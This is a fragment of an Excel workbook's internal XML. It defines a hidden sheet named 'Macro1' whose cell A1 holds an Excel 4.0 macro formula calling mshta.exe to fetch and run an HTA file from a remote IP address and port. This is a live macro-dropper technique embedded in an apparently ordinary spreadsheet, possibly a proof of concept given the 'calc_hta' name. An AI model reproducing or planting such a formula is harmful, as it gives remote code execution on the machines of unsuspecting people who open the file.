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B467FBD0-CA75-498C-941E-B5DD8C05B43C}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15840" firstSheet="1" activeTab="1" xr2:uid="{ADD0BE7F-8221-4AA7-AF73-2C4E2E067C7A}"/>
  </bookViews>
  <sheets>
    <sheet name="Macro1" sheetId="2" state="hidden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1ACF8AE-5503-4961-96EA-9512167CD578}">
  <dimension ref="A1"/>
  <sheetViews>
    <sheetView workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="123" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1" s="1">
        <f>EXEC("mshta.exe http://52.1.144.82:9001/calc_hta.hta")</f>
        <v>33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3592-FB84-4ED1-83EC-EEF3FA27BB1C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LaTortuga</dc:creator>
  <cp:lastModifiedBy>LaTortuga</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-02-22T18:32:37Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-23T00:12:58Z</dcterms:modified>
</cp:coreProperties>
</file>